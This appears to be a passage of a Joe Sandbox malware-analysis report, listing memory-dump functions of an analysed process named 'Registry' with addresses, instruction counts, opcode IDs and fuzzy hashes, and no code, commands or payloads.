                  • Source File: 00000014.00000002.2161149961.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_20_2_7ff848f10000_Registry.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 1ee897269d3e3516225e91ec32dd165c6e55ff6af416774ed80ff37fe7fb5368
                  • Instruction ID: 030a2aa7ffb20372d2ef65668a9cfdef438f135701acad49e2b158f254fae13c
                  • Opcode Fuzzy Hash: 1ee897269d3e3516225e91ec32dd165c6e55ff6af416774ed80ff37fe7fb5368
                  • Instruction Fuzzy Hash: 3802A430C0E68E9FEB95EF3488192F97BE1FF65351F0505BAD408C61D2EB286944C756
                  Function 00007FF848F13308 Relevance: .5, Instructions: 507COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000014.00000002.2161149961.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_20_2_7ff848f10000_Registry.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 1ff4f0251ca1bec4690feaeb35dbefc06e3ba57ce231fdc9669afff47223df13
                  • Instruction ID: e88d47a246eaea4dc9c5f4e611151397c9db994c31912a8fbd7e145ac56b2c8a
                  • Opcode Fuzzy Hash: 1ff4f0251ca1bec4690feaeb35dbefc06e3ba57ce231fdc9669afff47223df13
                  • Instruction Fuzzy Hash: EC31B122C0E6D19EE752B73C58661E97FB0FF42655F0904FBC0C8CA0D3EA1C6848836A
                  Function 00007FF848F17BDD Relevance: .5, Instructions: 485COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000014.00000002.2161149961.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_20_2_7ff848f10000_Registry.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 3f6eac33e1a30b56c67022d366b493146e1f3de00782faf5b93005ca33c01621
                  • Instruction ID: 3a6ce34c753f8b9caa75747bbfc9fae6a554e446eeb486660863df123362858f
                  • Opcode Fuzzy Hash: 3f6eac33e1a30b56c67022d366b493146e1f3de00782faf5b93005ca33c01621
                  • Instruction Fuzzy Hash: 9B719E3084DA8A8FD746EB3488696FA7BE0EF1A341F1504FBD409C70E6EB39A945C751
                  Function 00007FF848F13378 Relevance: .5, Instructions: 455COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000014.00000002.2161149961.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_20_2_7ff848f10000_Registry.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: c25f5d01f97913842c9cd40bf0b97aaecae9c5763d77500863f7f1aad4b4eb22
                  • Instruction ID: 568e5c79c28e6ef303f1b2ec626616b8011e08da6d77e1411b79508c8291e917
                  • Opcode Fuzzy Hash: c25f5d01f97913842c9cd40bf0b97aaecae9c5763d77500863f7f1aad4b4eb22
                  • Instruction Fuzzy Hash: B811517180E7C59FE752A77848591A97FB0EF12355F0904FBC088DA5D3EA2D6908C356
                  Function 00007FF848F0D9D1 Relevance: .4, Instructions: 383COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000014.00000002.2161149961.00007FF848F0A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F0A000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_20_2_7ff848f0a000_Registry.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: b2f1629ec2557e6de4df1005868572e9805467b7f1b736cd2924af22a7a8923c
                  • Instruction ID: 19ed88cc58eb741158c405bf5d51c656d7455af6eb2e4e820b070e79cb10d064
                  • Opcode Fuzzy Hash: b2f1629ec2557e6de4df1005868572e9805467b7f1b736cd2924af22a7a8923c
                  • Instruction Fuzzy Hash: 97D14971D19A5A8FEB98EB68D4947B8B7B1FF59340F0441BAD00DE32D2DB386880CB55
                  Function 00007FF848F13AFB Relevance: .3, Instructions: 321COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000014.00000002.2161149961.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_20_2_7ff848f10000_Registry.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: f5d8b4a1498f089037a624d469624f494f490ee71e5d21f1f3d264147285cba6
                  • Instruction ID: 134c78a92744ab8150138c651d67be3b3f0880b0a609f2dc564979f372037546
                  • Opcode Fuzzy Hash: f5d8b4a1498f089037a624d469624f494f490ee71e5d21f1f3d264147285cba6
                  • Instruction Fuzzy Hash: 38C12470D0C61A9EEB95EB68C8597E9BBF1FF58341F0041BAD04DE3292DB386984CB15
                  Function 00007FF848F17253 Relevance: .3, Instructions: 301COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000014.00000002.2161149961.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_20_2_7ff848f10000_Registry.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 8eaf97fc25a786065a17ae5e652055ee6db0854de82219dc46904fe7be0a99d9
                  • Instruction ID: 89317a2a3a95485a46537dc245c46eb2f8f465d58efb8fc643cefe6255d840ae
                  • Opcode Fuzzy Hash: 8eaf97fc25a786065a17ae5e652055ee6db0854de82219dc46904fe7be0a99d9
                  • Instruction Fuzzy Hash: B7A19D3084DA8A9FEB92FB7488595B97BF0FF19340F0545BAD40CC70A6EB38A944CB15
                  Function 00007FF848F17511 Relevance: .3, Instructions: 276COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000014.00000002.2161149961.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_20_2_7ff848f10000_Registry.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: b6824697c38ee91a498e25952a3334083dc679146bbefe5e5bd723efed12a4dc
                  • Instruction ID: dd3aded0c40c97a98387ed042f2bc32daecefce9914e2f6233a69add4965446f
                  • Opcode Fuzzy Hash: b6824697c38ee91a498e25952a3334083dc679146bbefe5e5bd723efed12a4dc
                  • Instruction Fuzzy Hash: B4A1AE3090DA8E8FEB45EB28C8586F97BE0FF19341F1504BAD409C71D6EB78A984CB15
                  Function 00007FF848F01738 Relevance: .3, Instructions: 263COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000014.00000002.2161149961.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_20_2_7ff848f00000_Registry.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: e6b8fe9099fd62f2db75893a40cbf77a6f4244609eb29333d12afda709d64292
                  • Instruction ID: 0f51ffb96b85c09f23da4442425e2f4932964165999a97efac4272fcf2316131
                  • Opcode Fuzzy Hash: e6b8fe9099fd62f2db75893a40cbf77a6f4244609eb29333d12afda709d64292
                  • Instruction Fuzzy Hash: 80719B31A0CA4A8FDB49EF1C88516A977E2FF9A744F14457AE44EC32C6DF34A842C785
                  Function 00007FF848F10D11 Relevance: .3, Instructions: 256COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000014.00000002.2161149961.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_20_2_7ff848f10000_Registry.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 959687b25510db0b5c9916f551f67f3a37a4c3d8e55cdabf516e21967cf02a46
                  • Instruction ID: a3758d82a460ed1b65c5e24796d6fdb48f85853003478bc0797f901112093728
                  • Opcode Fuzzy Hash: 959687b25510db0b5c9916f551f67f3a37a4c3d8e55cdabf516e21967cf02a46
                  • Instruction Fuzzy Hash: DA91573090C69E8FEB95FB2488596BA7BF1FF59341F0405BAD809C7192DB38A944CB45
                  Function 00007FF848F128B1 Relevance: .2, Instructions: 246COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000014.00000002.2161149961.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_20_2_7ff848f10000_Registry.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 3c1b4a97c389abca2395a33ffb15d9ebe10099fbc43eca5ae410447060cbf4be
                  • Instruction ID: 025e83fbd77db7cd071975a53791d3aa3d2245c984fdf3afb03fc1c49b45c336
                  • Opcode Fuzzy Hash: 3c1b4a97c389abca2395a33ffb15d9ebe10099fbc43eca5ae410447060cbf4be
                  • Instruction Fuzzy Hash: 0D81F870D0955E8EEBA4EBA8C8487EDBBF1FF59341F1041BAD00DE7291EB3469848B54
                  Function 00007FF848F12350 Relevance: .2, Instructions: 214COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000014.00000002.2161149961.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_20_2_7ff848f10000_Registry.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 4e7dc0b9be5c8c963d500546ac43862f7b79540a53b74d7852b08b49707838e2
                  • Instruction ID: f0341b09121d8d143d32ebd696e7c4fe37400e54633e45fb618f67321bee59c0
                  • Opcode Fuzzy Hash: 4e7dc0b9be5c8c963d500546ac43862f7b79540a53b74d7852b08b49707838e2
                  • Instruction Fuzzy Hash: 5D716D30D1D68A8FEB55EFA488592FA7BE0FF19340F05457AE809C21D2EB38A954CB45
                  Function 00007FF848F0C7FB Relevance: .2, Instructions: 209COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000014.00000002.2161149961.00007FF848F0A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F0A000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_20_2_7ff848f0a000_Registry.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: e1f70680785aa3c70eb1e1390eba2ebbfa0f026d35fe0784a397695031b01538
                  • Instruction ID: c8e18768f38241eced1294f3bca4113778f8ec5d77ca529a8301709049f970b9
                  • Opcode Fuzzy Hash: e1f70680785aa3c70eb1e1390eba2ebbfa0f026d35fe0784a397695031b01538
                  • Instruction Fuzzy Hash: 6851D12691E566DEE7417BACB4451FA7B60EF423B8F180277D1888D0D3EF1C248682AC
                  Function 00007FF848F16FCD Relevance: .2, Instructions: 207COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000014.00000002.2161149961.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_20_2_7ff848f10000_Registry.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 998aa0e68b4947a648c56b93f9f10c1588509bf014a13b6cdc461e61f2a120ec
                  • Instruction ID: d6578055f8f3aa089a8de46d06fdeafe296b13b58190823f85ad60e3db731e5e
                  • Opcode Fuzzy Hash: 998aa0e68b4947a648c56b93f9f10c1588509bf014a13b6cdc461e61f2a120ec
                  • Instruction Fuzzy Hash: 26718730D0DA4A8FEB54EB64C8586ADBBB1FF59340F10017AD40DE72C6DB38A9848B85
                  Function 00007FF848F12A31 Relevance: .2, Instructions: 204COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000014.00000002.2161149961.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_20_2_7ff848f10000_Registry.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 0456b1bd35f1d6af7fea173ff94f3c318900de317d991325290db19d22a81eaf
                  • Instruction ID: ed62aef4ad4c7a5ab62e0fe0edac8cf3f85e4a61f09c8ebce16d2a256b732530
                  • Opcode Fuzzy Hash: 0456b1bd35f1d6af7fea173ff94f3c318900de317d991325290db19d22a81eaf
                  • Instruction Fuzzy Hash: F381A470E1A51D8FEBA4EBA8C8957ADB7B1FF59340F1041A9D40DE3292EF3469848F44
                  Function 00007FF848F14AB8 Relevance: .2, Instructions: 204COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000014.00000002.2161149961.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_20_2_7ff848f10000_Registry.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: a0f9a9cbab86cdd4bde0f94fccbc79a8864cbdfdce5bc10e882547c4b26c370b
                  • Instruction ID: 6cba0e4ad7818faaae525a895fa5ea412836d0ba032e78177c63f06cc5de76a8
                  • Opcode Fuzzy Hash: a0f9a9cbab86cdd4bde0f94fccbc79a8864cbdfdce5bc10e882547c4b26c370b
                  • Instruction Fuzzy Hash: 6061C230D0E6CA9FEB56AF3488292B97FE1FF65341F0504BAD408C60D2EB289944C746
                  Function 00007FF848F01DBD Relevance: .2, Instructions: 194COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000014.00000002.2161149961.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_20_2_7ff848f00000_Registry.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: bd342a6a73afc9944c8b9d83dfc8051baeadfb9404e732328461d8d10fbe77f6
                  • Instruction ID: 6e63db10641d672194e15f23c58a713e8722c5084d8630a5bcb9b1933e775fbc
                  • Opcode Fuzzy Hash: bd342a6a73afc9944c8b9d83dfc8051baeadfb9404e732328461d8d10fbe77f6
                  • Instruction Fuzzy Hash: 7951CF31A0CA5A8FDB48EF1888555BA77E2FF99740F10457EE44AC32C1DF34A842C785
                  Function 00007FF848F123C0 Relevance: .2, Instructions: 180COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000014.00000002.2161149961.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_20_2_7ff848f10000_Registry.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: bdbebd22f9824fa740bcd8574cfb18b71dcd240d6d985a2168a848cffce6e07a
                  • Instruction ID: 6dcacdcc5d78814bd8710507575abd5b336b842a14f0390a2209d3fdb59483f4
                  • Opcode Fuzzy Hash: bdbebd22f9824fa740bcd8574cfb18b71dcd240d6d985a2168a848cffce6e07a
                  • Instruction Fuzzy Hash: 33516B3091D68A8FEB55EFA4C8552FE7BE0FF19340F01457AE809C21C2EB38A954CB85
                  Function 00007FF848F0DB6D Relevance: .2, Instructions: 180COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000014.00000002.2161149961.00007FF848F0A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F0A000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_20_2_7ff848f0a000_Registry.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 84f676261d8c8401205cba9a2820ab14f2f3122f045524624a7bd8215e71c2c9
                  • Instruction ID: 7ed41e9945a84697c7949886ef05e2b38f1db2fefc595c4811271f47d24ae568
                  • Opcode Fuzzy Hash: 84f676261d8c8401205cba9a2820ab14f2f3122f045524624a7bd8215e71c2c9
                  • Instruction Fuzzy Hash: 7361E970E1995D9FDB98EB58D8A47B8B7B1FF59340F0441BAD00DE7296DB386880CB05
                  Function 00007FF848F10D30 Relevance: .2, Instructions: 177COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000014.00000002.2161149961.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_20_2_7ff848f10000_Registry.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: e70136576beab49f12090e41653037d01ff60429e5fbd24081c9de3953949be7
                  • Instruction ID: 51c34dca558597ad85f596524a6a1719719765948d7a90ee93bb9e2b04fa6ec0
                  • Opcode Fuzzy Hash: e70136576beab49f12090e41653037d01ff60429e5fbd24081c9de3953949be7
                  • Instruction Fuzzy Hash: DE515A3091D79E8FEB95EF2488192FA7BF0FF56341F0505BAD808C7192EB38A9548785
                  Function 00007FF848F16070 Relevance: .2, Instructions: 175COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000014.00000002.2161149961.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_20_2_7ff848f10000_Registry.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 265be492f04b582b79af1a725c76dbbdb5d6118c59c151b0ed06ef8806d5d041
                  • Instruction ID: 3a7c0d1f1367016c17e946fe32e135450779dc7d10a2463858f9dd26ed78311a
                  • Opcode Fuzzy Hash: 265be492f04b582b79af1a725c76dbbdb5d6118c59c151b0ed06ef8806d5d041
                  • Instruction Fuzzy Hash: 4F613B70D0D65A8FEBA5AB6488597B9BAB0FF05340F0445BAD40DD22D2DF3C6D84CB46
                  Function 00007FF848F14B38 Relevance: .2, Instructions: 169COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000014.00000002.2161149961.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_20_2_7ff848f10000_Registry.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 8a349e708f1bedde74e19b2d94b3feb308310214954253ba1b58ef1987c361ee
                  • Instruction ID: 42541540b713a4a9ed9f2145959ba15a0f25670f08649f34cd2c64cc250cfa23
                  • Opcode Fuzzy Hash: 8a349e708f1bedde74e19b2d94b3feb308310214954253ba1b58ef1987c361ee
                  • Instruction Fuzzy Hash: 9451B330D0E68A9FEB95EF3888292F97BE1FF65351F0505BAD40CC61D2DB28A944C746
                  Function 00007FF848F032A5 Relevance: .2, Instructions: 169COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000014.00000002.2161149961.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_20_2_7ff848f00000_Registry.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: dcc06f7efa41930d51d22d81c3d3f1399e5ed984d1f97db286133b83a4937e66
                  • Instruction ID: 99406ec077e07125042cb5797191fa45cd3836a3275339bbcbecc429fead10a1
                  • Opcode Fuzzy Hash: dcc06f7efa41930d51d22d81c3d3f1399e5ed984d1f97db286133b83a4937e66
                  • Instruction Fuzzy Hash: 7C511474D0C6198FEB65EBA8C4946EDBBB1EF59341F50013AD009EB2D2EB38A944CB14
                  Function 00007FF848F13758 Relevance: .2, Instructions: 166COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000014.00000002.2161149961.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_20_2_7ff848f10000_Registry.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: db5ae6bb7032790b4359701e95c7871d638a9a3178d1ca8b1ead68e8ea9fae7a
                  • Instruction ID: f69ac59aa9e1733c1b3d5fcfc2fe3afc4ab17b518df558fcabd9a7931880c82c
                  • Opcode Fuzzy Hash: db5ae6bb7032790b4359701e95c7871d638a9a3178d1ca8b1ead68e8ea9fae7a
                  • Instruction Fuzzy Hash: D451E130D0D68A9FEB89EF2884596B97BE1FFA9341F0404BAD40DC71D2DB38A944C756
                  Function 00007FF848F023A6 Relevance: .1, Instructions: 128COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000014.00000002.2161149961.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_20_2_7ff848f00000_Registry.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 1f201b6b6c4fb925f160123661e955a2414c05bff37d0878437e6876e7e6d152
                  • Instruction ID: 8d94a753372b11a78c2ea1f0dd438b0116e9ac2d47053275666fe665cad9c47d
                  • Opcode Fuzzy Hash: 1f201b6b6c4fb925f160123661e955a2414c05bff37d0878437e6876e7e6d152
                  • Instruction Fuzzy Hash: FD515E74C0D5298EEB65BB5488517FC76B0FF46350F5042BAD48E962C2EF782988CB68
                  Function 00007FF848F15367 Relevance: .1, Instructions: 127COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000014.00000002.2161149961.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_20_2_7ff848f10000_Registry.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: eb2331a185b09938d39b76d14877010fcb81e1cf50406dcf1b9c47062d6622d9
                  • Instruction ID: 473c8929b277089f9619c719d49ee57355e0582a8639a0cf0c044e7d5f9a940d
                  • Opcode Fuzzy Hash: eb2331a185b09938d39b76d14877010fcb81e1cf50406dcf1b9c47062d6622d9
                  • Instruction Fuzzy Hash: 8F41D870D1895D9FEF94EBA8D899BACBBF1FF58341F50016AD00DE7296DB3468818B40
                  Function 00007FF848F0C8D3 Relevance: .1, Instructions: 113COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000014.00000002.2161149961.00007FF848F0A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F0A000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_20_2_7ff848f0a000_Registry.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 3966c5ce9709dc978978698a4f7e40759557249de756daae5f1183b1f9c822c7
                  • Instruction ID: 614602897a15be6896e09fc214290cb099b8c4678be627874aa6dbe0e33e0ce1
                  • Opcode Fuzzy Hash: 3966c5ce9709dc978978698a4f7e40759557249de756daae5f1183b1f9c822c7
                  • Instruction Fuzzy Hash: D831B03690E6569FEB55BBACA4551FD3B60EF523A5F040277D508CA0C3FF2C244582AD
                  Function 00007FF848F0AEFA Relevance: .1, Instructions: 109COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000014.00000002.2161149961.00007FF848F0A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F0A000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_20_2_7ff848f0a000_Registry.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 95b00868f8dc758853699d667be0cce1ac01159510799ba2b441e815531222a9
                  • Instruction ID: bafa9d23c77f8a92aa6989ba6a4df642e992f8efdb8e2ded467eadbee17c025e
                  • Opcode Fuzzy Hash: 95b00868f8dc758853699d667be0cce1ac01159510799ba2b441e815531222a9
                  • Instruction Fuzzy Hash: AA31E1B2D0D98A9FE741FB7858581E97BE0FF66352F0804BAC408CB1D2FF2458858359
                  Function 00007FF848F0C1E8 Relevance: .1, Instructions: 109COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000014.00000002.2161149961.00007FF848F0A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F0A000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_20_2_7ff848f0a000_Registry.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: dc6ae5baaecad52ba4421025c6e94b38b5cd3ff60c608e3f58d4e2cacafe44c5
                  • Instruction ID: 8f07624e8811ca1f1b886249330173c477f17b02f4c459c06218bbb1d6feb696
                  • Opcode Fuzzy Hash: dc6ae5baaecad52ba4421025c6e94b38b5cd3ff60c608e3f58d4e2cacafe44c5
                  • Instruction Fuzzy Hash: 1231D335E1C91D9EEB94EB989895AFCB7B1FF6A340F501139D00DE3282EF2468429B44
                  Function 00007FF848F0C260 Relevance: .1, Instructions: 94COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000014.00000002.2161149961.00007FF848F0A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F0A000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_20_2_7ff848f0a000_Registry.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 3fdef6cfca83d346d47142a17b3689dc67796afbe84a3a6a215883f0ad77cfc5
                  • Instruction ID: 990419ee4c0ec89d3b7cc17926c36df57d04c38eda7e1ce219f60aaeb887a98d
                  • Opcode Fuzzy Hash: 3fdef6cfca83d346d47142a17b3689dc67796afbe84a3a6a215883f0ad77cfc5
                  • Instruction Fuzzy Hash: F221F830E1D91D8FDB94FBA89895AECB7B1FF5A340F50112AD00DE7282EF2568419744
                  Function 00007FF848F14C48 Relevance: .1, Instructions: 91COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000014.00000002.2161149961.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_20_2_7ff848f10000_Registry.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: f315ba2faaeed2d1f8e6be440b17a78deb88264f04bd4bec8853c4ab07cb7c7f
                  • Instruction ID: 6360b3b52447de07407dac9f663611e3cdf8fae0852e0cc618c4eb9d4500f62a
                  • Opcode Fuzzy Hash: f315ba2faaeed2d1f8e6be440b17a78deb88264f04bd4bec8853c4ab07cb7c7f
                  • Instruction Fuzzy Hash: 8731C531C0E68A9FEB99EF2484292B93AE1FF65345F0401BAD80CC21D2DB385954C746
                  Function 00007FF848F0B1ED Relevance: .1, Instructions: 88COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000014.00000002.2161149961.00007FF848F0A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F0A000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_20_2_7ff848f0a000_Registry.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 4f9d75687945563126a98e17ce64ff80f0a290eae093baf15f3e5a605b778757
                  • Instruction ID: 751fb966edb7b2e370acc78dcd09543a3c2cadd784d28ca3f8474d6798d2d947
                  • Opcode Fuzzy Hash: 4f9d75687945563126a98e17ce64ff80f0a290eae093baf15f3e5a605b778757
                  • Instruction Fuzzy Hash: 7E310670D1952E9EEB94EF94C8447ECB6F1FF59341F1041BAD00DE2291EB7869848F58
                  Function 00007FF848F10E50 Relevance: .1, Instructions: 82COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000014.00000002.2161149961.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_20_2_7ff848f10000_Registry.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 77ca7a8c7fb10d937790b5764d70b974cee83f232ae3f15953a98b6743526649
                  • Instruction ID: eff79277f09a42d270c3aee4628101fdfad389d5ea47d70b0e7569b4742ecd92
                  • Opcode Fuzzy Hash: 77ca7a8c7fb10d937790b5764d70b974cee83f232ae3f15953a98b6743526649
                  • Instruction Fuzzy Hash: 1D217A3091D79E8FEB95BB24C8182BA7BE1FF56350F0505BAD808C71D2EB78A944C745
                  Function 00007FF848F02248 Relevance: .1, Instructions: 79COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000014.00000002.2161149961.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_20_2_7ff848f00000_Registry.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: d442419431e55443d9a84bc40ec0ec79b5201febdd3aaf490ab42c2362a6b91d
